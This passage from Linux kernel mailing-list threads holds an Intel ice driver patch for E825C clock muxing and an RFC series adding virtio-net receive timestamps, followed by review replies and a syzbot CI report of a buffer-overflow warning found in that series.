recovered clock 
source for given output. + * + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output) +{ + u8 active_clk; + u32 val; + int err; + + switch (output) { + case ICE_SYNCE_CLK0: + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, val); + break; + case ICE_SYNCE_CLK1: + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, val); + break; + default: + return -EINVAL; + } + + if (active_clk == port % hw->ptp.ports_per_phy + + ICE_CGU_BYPASS_MUX_OFFSET_E825C) + *active = true; + else + *active = false; + + return 0; +} + +/** + * ice_tspll_cfg_bypass_mux_e825c - configure reference clock mux + * @hw: Pointer to the HW struct + * @ena: true to enable the reference, false if disable + * @port_num: Number of the port + * @output: Output pin, we have two in E825C + * + * Set reference clock source and output clock selection. 
+ * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output) +{ + u8 first_mux; + int err; + u32 r10; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &r10); + if (err) + return err; + + if (!ena) + first_mux = ICE_CGU_NET_REF_CLK0; + else + first_mux = port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C; + + r10 &= ~(ICE_CGU_R10_SYNCE_DCK_RST | ICE_CGU_R10_SYNCE_DCK2_RST); + + switch (output) { + case ICE_SYNCE_CLK0: + r10 &= ~(ICE_CGU_R10_SYNCE_ETHCLKO_SEL | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD | + ICE_CGU_R10_SYNCE_S_REF_CLK); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_S_REF_CLK, first_mux); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHCLKO_SEL, + ICE_CGU_REF_CLK_BYP0_DIV); + break; + case ICE_SYNCE_CLK1: + { + u32 val; + + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + val &= ~ICE_CGU_R11_SYNCE_S_BYP_CLK; + val |= FIELD_PREP(ICE_CGU_R11_SYNCE_S_BYP_CLK, first_mux); + err = ice_write_cgu_reg(hw, ICE_CGU_R11, val); + if (err) + return err; + r10 &= ~(ICE_CGU_R10_SYNCE_CLKODIV_LOAD | + ICE_CGU_R10_SYNCE_CLKO_SEL); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKO_SEL, + ICE_CGU_REF_CLK_BYP1_DIV); + break; + } + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, r10); + if (err) + return err; + + return 0; +} + +/** + * ice_tspll_get_div_e825c - get the divider for the given speed + * @link_speed: link speed of the port + * @divider: output value, calculated divider + * + * Get CGU divider value based on the link speed. 
+ * + * Return: + * * 0 - success + * * negative - error + */ +static int ice_tspll_get_div_e825c(u16 link_speed, unsigned int *divider) +{ + switch (link_speed) { + case ICE_AQ_LINK_SPEED_100GB: + case ICE_AQ_LINK_SPEED_50GB: + case ICE_AQ_LINK_SPEED_25GB: + *divider = 10; + break; + case ICE_AQ_LINK_SPEED_40GB: + case ICE_AQ_LINK_SPEED_10GB: + *divider = 4; + break; + case ICE_AQ_LINK_SPEED_5GB: + case ICE_AQ_LINK_SPEED_2500MB: + case ICE_AQ_LINK_SPEED_1000MB: + *divider = 2; + break; + case ICE_AQ_LINK_SPEED_100MB: + *divider = 1; + break; + default: + return -EOPNOTSUPP; + } + + return 0; +} + +/** + * ice_tspll_cfg_synce_ethdiv_e825c - set the divider on the mux + * @hw: Pointer to the HW struct + * @output: Output pin, we have two in E825C + * + * Set the correct CGU divider for RCLKA or RCLKB. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output) +{ + unsigned int divider; + u16 link_speed; + u32 val; + int err; + + link_speed = hw->port_info->phy.link_info.link_speed; + if (!link_speed) + return 0; + + err = ice_tspll_get_div_e825c(link_speed, &divider); + if (err) + return err; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + + /* programmable divider value (from 2 to 16) minus 1 for ETHCLKOUT */ + switch (output) { + case ICE_SYNCE_CLK0: + val &= ~(ICE_CGU_R10_SYNCE_ETHDIV_M1 | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHDIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_ETHDIV_LOAD; + break; + case ICE_SYNCE_CLK1: + val &= ~(ICE_CGU_R10_SYNCE_CLKODIV_M1 | + ICE_CGU_R10_SYNCE_CLKODIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKODIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_CLKODIV_LOAD; + break; + default: + 
return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + + return 0; +} diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.h b/drivers/net/ethernet/intel/ice/ice_tspll.h index c0b1232cc07c3..d650867004d1f 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.h +++ b/drivers/net/ethernet/intel/ice/ice_tspll.h @@ -21,11 +21,22 @@ struct ice_tspll_params_e82x { u32 frac_n_div; }; +#define ICE_CGU_NET_REF_CLK0 0x0 +#define ICE_CGU_REF_CLK_BYP0 0x5 +#define ICE_CGU_REF_CLK_BYP0_DIV 0x0 +#define ICE_CGU_REF_CLK_BYP1 0x4 +#define ICE_CGU_REF_CLK_BYP1_DIV 0x1 + #define ICE_TSPLL_CK_REFCLKFREQ_E825 0x1F #define ICE_TSPLL_NDIVRATIO_E825 5 #define ICE_TSPLL_FBDIV_INTGR_E825 256 int ice_tspll_cfg_pps_out_e825c(struct ice_hw *hw, bool enable); int ice_tspll_init(struct ice_hw *hw); - +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output); +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output); +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output); #endif /* _ICE_TSPLL_H_ */ diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h index 6a2ec8389a8f3..1e82f4c40b326 100644 --- a/drivers/net/ethernet/intel/ice/ice_type.h +++ b/drivers/net/ethernet/intel/ice/ice_type.h @@ -349,6 +349,12 @@ enum ice_clk_src { NUM_ICE_CLK_SRC }; +enum ice_synce_clk { + ICE_SYNCE_CLK0, + ICE_SYNCE_CLK1, + ICE_SYNCE_CLK_NUM +}; + struct ice_ts_func_info { /* Function specific info */ enum ice_tspll_freq time_ref; -- 2.52.0
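For reference, the link-speed to CGU divider mapping implemented by ice_tspll_get_div_e825c() in the patch above can be exercised as a standalone function. This is a sketch under assumptions: it matches on plain Mb/s numbers instead of the driver's ICE_AQ_LINK_SPEED_* flag encoding, and the function name here is illustrative.

```c
#include <assert.h>

/* Standalone sketch of the link-speed -> CGU divider mapping from
 * ice_tspll_get_div_e825c(). Speeds are plain Mb/s values here; the real
 * driver matches on ICE_AQ_LINK_SPEED_* flags. Returns 0 on success,
 * -1 for an unsupported speed. */
static int tspll_get_div(unsigned int speed_mbps, unsigned int *divider)
{
	switch (speed_mbps) {
	case 100000:
	case 50000:
	case 25000:
		*divider = 10;
		break;
	case 40000:
	case 10000:
		*divider = 4;
		break;
	case 5000:
	case 2500:
	case 1000:
		*divider = 2;
		break;
	case 100:
		*divider = 1;
		break;
	default:
		return -1;
	}
	return 0;
}
```

The register sequence in ice_tspll_cfg_synce_ethdiv_e825c() then programs divider - 1 into the ETHDIV_M1/CLKODIV_M1 field and raises the corresponding LOAD bit in a second write.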
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:38 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
Demonstrate support for the new virtio-net feature VIRTIO_NET_F_TSTAMP. This is not intended to be merged. A full feature test also requires a patched qemu binary that knows these features and negotiates correct vnet_hdr_sz in virtio_net_set_mrg_rx_bufs. See https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Not-yet-signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- drivers/net/tun.c | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/drivers/net/tun.c b/drivers/net/tun.c index 8192740357a09..aa988a9c4bc99 100644 --- a/drivers/net/tun.c +++ b/drivers/net/tun.c @@ -2065,23 +2065,29 @@ static ssize_t tun_put_user(struct tun_struct *tun, } if (vnet_hdr_sz) { - struct virtio_net_hdr_v1_hash_tunnel hdr; - struct virtio_net_hdr *gso; + struct virtio_net_hdr_v1_hash_tunnel_ts hdr; + + memset(&hdr, 0, sizeof(hdr)); ret = tun_vnet_hdr_tnl_from_skb(tun->flags, tun->dev, skb, - &hdr); + (struct virtio_net_hdr_v1_hash_tunnel *)&hdr); if (ret) return ret; - /* - * Drop the packet if the configured header size is too small - * WRT the enabled offloads. - */ - gso = (struct virtio_net_hdr *)&hdr; - ret = __tun_vnet_hdr_put(vnet_hdr_sz, tun->dev->features, - iter, gso); - if (ret) - return ret; + if (vnet_hdr_sz >= sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts)) { + u64 tstamp = ktime_get_ns(); + + hdr.tstamp_0 = cpu_to_le16(tstamp & 0xffff); + hdr.tstamp_1 = cpu_to_le16(tstamp >> 16); + hdr.tstamp_2 = cpu_to_le16(tstamp >> 32); + hdr.tstamp_3 = cpu_to_le16(tstamp >> 48); + } + + if (unlikely(iov_iter_count(iter) < vnet_hdr_sz)) + return -EINVAL; + + if (unlikely(copy_to_iter(&hdr, vnet_hdr_sz, iter) != vnet_hdr_sz)) + return -EFAULT; } if (vlan_hlen) { -- 2.52.0
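The four 16-bit tstamp words this patch fills in can be exercised outside the kernel. A minimal sketch of the split done on the tun side and the reassembly the guest driver has to perform; the names (struct tstamp_words, tstamp_split/tstamp_join) are illustrative, and the __le16/__le64 endianness conversions are deliberately omitted, with host-order integers standing in.

```c
#include <assert.h>
#include <stdint.h>

/* Mirror of the tstamp_0..tstamp_3 fields appended to the vnet header:
 * a 64-bit nanosecond timestamp carried as four 16-bit words,
 * least-significant word first. Host byte order here, not __le16. */
struct tstamp_words {
	uint16_t tstamp_0;	/* bits 15:0  */
	uint16_t tstamp_1;	/* bits 31:16 */
	uint16_t tstamp_2;	/* bits 47:32 */
	uint16_t tstamp_3;	/* bits 63:48 */
};

/* Producer side: split the timestamp, as tun_put_user() does. */
static void tstamp_split(uint64_t ns, struct tstamp_words *w)
{
	w->tstamp_0 = (uint16_t)(ns >> 0);
	w->tstamp_1 = (uint16_t)(ns >> 16);
	w->tstamp_2 = (uint16_t)(ns >> 32);
	w->tstamp_3 = (uint16_t)(ns >> 48);
}

/* Consumer side: reassemble, as virtio_net_tstamp_value() does. */
static uint64_t tstamp_join(const struct tstamp_words *w)
{
	return (uint64_t)w->tstamp_0 |
	       ((uint64_t)w->tstamp_1 << 16) |
	       ((uint64_t)w->tstamp_2 << 32) |
	       ((uint64_t)w->tstamp_3 << 48);
}
```

The round trip is lossless: join(split(ns)) == ns for any 64-bit value.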
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 09:06:41 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
Add optional hardware rx timestamp offload for virtio-net. Introduce virtio feature VIRTIO_NET_F_TSTAMP. If negotiated, the virtio-net header is expanded with room for a timestamp. To get and set the hwtstamp config, the ndo_hwtstamp_set/get callbacks are implemented. This allows filtering the packets and timestamping only those that match the filter. This way, timestamping can be enabled/disabled at runtime. Tested: guest: ./timestamping eth0 \ SOF_TIMESTAMPING_RAW_HARDWARE \ SOF_TIMESTAMPING_RX_HARDWARE host: nc -4 -u 192.168.1.1 319 Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> -- Changes to last version: - rework series to use flow filters - add new struct virtio_net_hdr_v1_hash_tunnel_ts - original work done by: Willem de Bruijn <willemb@google.com> --- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 2 files changed, 133 insertions(+), 12 deletions(-) diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c index 1bb3aeca66c6e..4e8d9b20c1b34 100644 --- a/drivers/net/virtio_net.c +++ b/drivers/net/virtio_net.c @@ -429,6 +429,9 @@ struct virtnet_info { struct virtio_net_rss_config_trailer rss_trailer; u8 rss_hash_key_data[VIRTIO_NET_RSS_MAX_KEY_SIZE]; + /* Device passes rx time stamps to the driver */ + bool has_tstamp; + /* Has control virtqueue */ bool has_cvq; @@ -475,6 +478,8 @@ struct virtnet_info { struct control_buf *ctrl; + struct kernel_hwtstamp_config tstamp_config; + /* Ethtool settings */ u8 duplex; u32 speed; @@ -511,6 +516,7 @@ struct virtio_net_common_hdr { struct virtio_net_hdr_mrg_rxbuf mrg_hdr; struct virtio_net_hdr_v1_hash hash_v1_hdr; struct virtio_net_hdr_v1_hash_tunnel tnl_hdr; + struct virtio_net_hdr_v1_hash_tunnel_ts ts_hdr; }; }; @@ -682,6 +688,13 @@ skb_vnet_common_hdr(struct sk_buff *skb) return (struct virtio_net_common_hdr *)skb->cb; } +static inline struct virtio_net_hdr_v1_hash_tunnel_ts *skb_vnet_hdr_ts(struct sk_buff *skb) +{ +
BUILD_BUG_ON(sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) > sizeof(skb->cb)); + + return (void *)skb->cb; +} + /* * private is used to chain pages for big packets, put the whole * most recent used list in the beginning for reuse @@ -2560,6 +2573,15 @@ virtio_net_hash_value(const struct virtio_net_hdr_v1_hash *hdr_hash) (__le16_to_cpu(hdr_hash->hash_value_hi) << 16); } +static inline u64 +virtio_net_tstamp_value(const struct virtio_net_hdr_v1_hash_tunnel_ts *hdr_hash_ts) +{ + return (u64)__le16_to_cpu(hdr_hash_ts->tstamp_0) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_1) << 16) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_2) << 32) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_3) << 48); +} + static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash, struct sk_buff *skb) { @@ -2589,6 +2611,18 @@ static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash, skb_set_hash(skb, virtio_net_hash_value(hdr_hash), rss_hash_type); } +static inline void virtnet_record_rx_tstamp(const struct virtnet_info *vi, + struct sk_buff *skb) +{ + struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb); + const struct virtio_net_hdr_v1_hash_tunnel_ts *h = skb_vnet_hdr_ts(skb); + u64 ts; + + ts = virtio_net_tstamp_value(h); + memset(shhwtstamps, 0, sizeof(struct skb_shared_hwtstamps)); + shhwtstamps->hwtstamp = ns_to_ktime(ts); +} + static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *rq, struct sk_buff *skb, u8 flags) { @@ -2617,6 +2651,8 @@ static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue * goto frame_err; } + if (vi->has_tstamp && vi->tstamp_config.rx_filter != HWTSTAMP_FILTER_NONE) + virtnet_record_rx_tstamp(vi, skb); skb_record_rx_queue(skb, vq2rxq(rq->vq)); skb->protocol = eth_type_trans(skb, dev); pr_debug("Receiving skb proto 0x%04x len %i type %i\n", @@ -3321,7 +3357,7 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) { const unsigned char *dest = 
 			((struct ethhdr *)skb->data)->h_dest;
 	struct virtnet_info *vi = sq->vq->vdev->priv;
-	struct virtio_net_hdr_v1_hash_tunnel *hdr;
+	struct virtio_net_hdr_v1_hash_tunnel_ts *hdr;
 	int num_sg;
 	unsigned hdr_len = vi->hdr_len;
 	bool can_push;
@@ -3329,8 +3365,8 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
 	pr_debug("%s: xmit %p %pM\n", vi->dev->name, skb, dest);

 	/* Make sure it's safe to cast between formats */
-	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr));
-	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr.hdr));
+	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr));
+	BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr.hdr));

 	can_push = vi->any_header_sg &&
 		!((unsigned long)skb->data & (__alignof__(*hdr) - 1)) &&
@@ -3338,18 +3374,18 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
 	/* Even if we can, don't push here yet as this would skew
 	 * csum_start offset below. */
 	if (can_push)
-		hdr = (struct virtio_net_hdr_v1_hash_tunnel *)(skb->data -
-							       hdr_len);
+		hdr = (struct virtio_net_hdr_v1_hash_tunnel_ts *)(skb->data -
+								  hdr_len);
 	else
-		hdr = &skb_vnet_common_hdr(skb)->tnl_hdr;
+		hdr = &skb_vnet_common_hdr(skb)->ts_hdr;

-	if (virtio_net_hdr_tnl_from_skb(skb, hdr, vi->tx_tnl,
+	if (virtio_net_hdr_tnl_from_skb(skb, &hdr->tnl, vi->tx_tnl,
 					virtio_is_little_endian(vi->vdev), 0, false))
 		return -EPROTO;

 	if (vi->mergeable_rx_bufs)
-		hdr->hash_hdr.hdr.num_buffers = 0;
+		hdr->tnl.hash_hdr.hdr.num_buffers = 0;

 	sg_init_table(sq->sg, skb_shinfo(skb)->nr_frags + (can_push ? 1 : 2));
 	if (can_push) {
@@ -5563,6 +5599,22 @@ static int virtnet_get_per_queue_coalesce(struct net_device *dev,
 	return 0;
 }

+static int virtnet_get_ts_info(struct net_device *dev,
+			       struct kernel_ethtool_ts_info *info)
+{
+	/* setup default software timestamp */
+	ethtool_op_get_ts_info(dev, info);
+
+	info->rx_filters = (BIT(HWTSTAMP_FILTER_NONE) |
+			    BIT(HWTSTAMP_FILTER_PTP_V1_L4_SYNC) |
+			    BIT(HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ) |
+			    BIT(HWTSTAMP_FILTER_ALL));
+
+	info->tx_types = HWTSTAMP_TX_OFF;
+
+	return 0;
+}
+
 static void virtnet_init_settings(struct net_device *dev)
 {
 	struct virtnet_info *vi = netdev_priv(dev);
@@ -5658,7 +5710,7 @@ static const struct ethtool_ops virtnet_ethtool_ops = {
 	.get_ethtool_stats = virtnet_get_ethtool_stats,
 	.set_channels = virtnet_set_channels,
 	.get_channels = virtnet_get_channels,
-	.get_ts_info = ethtool_op_get_ts_info,
+	.get_ts_info = virtnet_get_ts_info,
 	.get_link_ksettings = virtnet_get_link_ksettings,
 	.set_link_ksettings = virtnet_set_link_ksettings,
 	.set_coalesce = virtnet_set_coalesce,
@@ -6242,6 +6294,58 @@ static void virtnet_tx_timeout(struct net_device *dev, unsigned int txqueue)
 		   jiffies_to_usecs(jiffies - READ_ONCE(txq->trans_start)));
 }

+static int virtnet_hwtstamp_get(struct net_device *dev,
+				struct kernel_hwtstamp_config *tstamp_config)
+{
+	struct virtnet_info *vi = netdev_priv(dev);
+
+	if (!netif_running(dev))
+		return -EINVAL;
+
+	*tstamp_config = vi->tstamp_config;
+
+	return 0;
+}
+
+static int virtnet_hwtstamp_set(struct net_device *dev,
+				struct kernel_hwtstamp_config *tstamp_config,
+				struct netlink_ext_ack *extack)
+{
+	struct virtnet_info *vi = netdev_priv(dev);
+
+	if (!netif_running(dev))
+		return -EINVAL;
+
+	switch (tstamp_config->rx_filter) {
+	case HWTSTAMP_FILTER_PTP_V1_L4_SYNC:
+	case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ:
+		break;
+	case HWTSTAMP_FILTER_PTP_V2_EVENT:
+	case HWTSTAMP_FILTER_PTP_V2_L2_EVENT:
+	case HWTSTAMP_FILTER_PTP_V2_L4_EVENT:
+	case HWTSTAMP_FILTER_PTP_V2_SYNC:
+	case HWTSTAMP_FILTER_PTP_V2_L2_SYNC:
+	case HWTSTAMP_FILTER_PTP_V2_L4_SYNC:
+	case HWTSTAMP_FILTER_PTP_V2_DELAY_REQ:
+	case HWTSTAMP_FILTER_PTP_V2_L2_DELAY_REQ:
+	case HWTSTAMP_FILTER_PTP_V2_L4_DELAY_REQ:
+		tstamp_config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+		break;
+	case HWTSTAMP_FILTER_NONE:
+		break;
+	case HWTSTAMP_FILTER_ALL:
+		tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+		break;
+	default:
+		tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+		return -ERANGE;
+	}
+
+	vi->tstamp_config = *tstamp_config;
+
+	return 0;
+}
+
 static int virtnet_init_irq_moder(struct virtnet_info *vi)
 {
 	u8 profile_flags = 0, coal_flags = 0;
@@ -6289,6 +6393,8 @@ static const struct net_device_ops virtnet_netdev = {
 	.ndo_get_phys_port_name = virtnet_get_phys_port_name,
 	.ndo_set_features = virtnet_set_features,
 	.ndo_tx_timeout = virtnet_tx_timeout,
+	.ndo_hwtstamp_set = virtnet_hwtstamp_set,
+	.ndo_hwtstamp_get = virtnet_hwtstamp_get,
 };

 static void virtnet_config_changed_work(struct work_struct *work)
@@ -6911,6 +7017,9 @@ static int virtnet_probe(struct virtio_device *vdev)
 	if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT))
 		vi->has_rss_hash_report = true;

+	if (virtio_has_feature(vdev, VIRTIO_NET_F_TSTAMP))
+		vi->has_tstamp = true;
+
 	if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) {
 		vi->has_rss = true;

@@ -6945,8 +7054,10 @@ static int virtnet_probe(struct virtio_device *vdev)
 		dev->xdp_metadata_ops = &virtnet_xdp_metadata_ops;
 	}

-	if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
-	    virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
+	if (vi->has_tstamp)
+		vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts);
+	else if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
+		 virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
 		vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel);
 	else if (vi->has_rss_hash_report)
 		vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash);
@@ -7269,7 +7380,8 @@ static struct virtio_device_id id_table[] = {
 	VIRTIO_NET_F_SPEED_DUPLEX, VIRTIO_NET_F_STANDBY, \
 	VIRTIO_NET_F_RSS, VIRTIO_NET_F_HASH_REPORT, VIRTIO_NET_F_NOTF_COAL, \
 	VIRTIO_NET_F_VQ_NOTF_COAL, \
-	VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS
+	VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS, \
+	VIRTIO_NET_F_TSTAMP

 static unsigned int features[] = {
 	VIRTNET_FEATURES,
diff --git a/include/uapi/linux/virtio_net.h b/include/uapi/linux/virtio_net.h
index 1db45b01532b5..9f967575956b8 100644
--- a/include/uapi/linux/virtio_net.h
+++ b/include/uapi/linux/virtio_net.h
@@ -56,6 +56,7 @@
 #define VIRTIO_NET_F_MQ	22	/* Device supports Receive Flow
					 * Steering */
 #define VIRTIO_NET_F_CTRL_MAC_ADDR 23	/* Set MAC address */
+#define VIRTIO_NET_F_TSTAMP 49	/* Device sends TAI receive time */
 #define VIRTIO_NET_F_DEVICE_STATS 50	/* Device can provide device-level statistics. */
 #define VIRTIO_NET_F_VQ_NOTF_COAL 52	/* Device supports virtqueue notification coalescing */
 #define VIRTIO_NET_F_NOTF_COAL 53	/* Device supports notifications coalescing */
@@ -215,6 +216,14 @@ struct virtio_net_hdr_v1_hash_tunnel {
 	__le16 inner_nh_offset;
 };

+struct virtio_net_hdr_v1_hash_tunnel_ts {
+	struct virtio_net_hdr_v1_hash_tunnel tnl;
+	__le16 tstamp_0;
+	__le16 tstamp_1;
+	__le16 tstamp_2;
+	__le16 tstamp_3;
+};
+
 #ifndef VIRTIO_NET_NO_LEGACY
 /* This header comes first in the scatter-gather list.
  * For legacy virtio, if VIRTIO_F_ANY_LAYOUT is not negotiated, it must
--
2.52.0
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 09:06:42 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
On Thu, 29 Jan 2026 09:06:42 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote: Since patch #1 used this struct, this one should be placed first in the series. Also, has the virtio specification process accepted such a draft proposal? Thanks
{ "author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>", "date": "Thu, 29 Jan 2026 17:48:25 +0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
Hi, On 2026-01-29 at 17:48 +08, Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote: oh, you are right, the order should be the other way around. I haven't sent the draft yet, because I'm unsure if I understood the way this should be implemented with the flow filter correctly. If the direction is correct, I'd try and get the specification process going again. (That is not that easy, if you're not used to it and not that deep into the whole virtio universe ;)) Best regards, Steffen -- Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar | Steuerwalder Str. 21 | https://www.pengutronix.de/ | 31137 Hildesheim, Germany | Phone: +49-5121-206917-0 | Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 11:08:27 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
On Thu, 29 Jan 2026 11:08:27 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote: There have been many historical attempts in this area; you may want to take a look at those first. Thanks.
{ "author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>", "date": "Thu, 29 Jan 2026 19:03:15 +0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
syzbot ci has tested the following series

[v2] virtio-net: add flow filter for receive timestamps
https://lore.kernel.org/all/20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de
* [PATCH RFC v2 1/2] tun: support rx-tstamp
* [PATCH RFC v2 2/2] virtio-net: support receive timestamp

and found the following issue:
WARNING in __copy_overflow

Full report is available here:
https://ci.syzbot.org/series/0b35c8c9-603b-4126-ac04-0095faadb2f5

***

WARNING in __copy_overflow

tree:      net-next
URL:       https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git
base:      ffeafa65b2b26df2f5b5a6118d3174f17bd12ec5
arch:      amd64
compiler:  Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
config:    https://ci.syzbot.org/builds/d8316da2-2688-4d74-bbf4-e8412e24d106/config
C repro:   https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/c_repro
syz repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/syz_repro

------------[ cut here ]------------
Buffer overflow detected (32 < 1840)!
WARNING: mm/maccess.c:234 at __copy_overflow+0x17/0x30 mm/maccess.c:234, CPU#0: syz.0.17/5993
Modules linked in:
CPU: 0 UID: 0 PID: 5993 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__copy_overflow+0x1c/0x30 mm/maccess.c:234
Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 53 48 89 f3 89 fd e8 60 b1 c4 ff 48 8d 3d 39 25 d5 0d 89 ee 48 89 da <67> 48 0f b9 3a 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 90 90
RSP: 0018:ffffc90003b97888 EFLAGS: 00010293
RAX: ffffffff81fdcf50 RBX: 0000000000000730 RCX: ffff88810ccd9d40
RDX: 0000000000000730 RSI: 0000000000000020 RDI: ffffffff8fd2f490
RBP: 0000000000000020 R08: ffffffff8fcec777 R09: 1ffffffff1f9d8ee
R10: dffffc0000000000 R11: ffffffff81742230 R12: dffffc0000000000
R13: 0000000000000000 R14: 0000000000000730 R15: 1ffff92000772f30
FS:  00007f08c446a6c0(0000) GS:ffff88818e32d000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
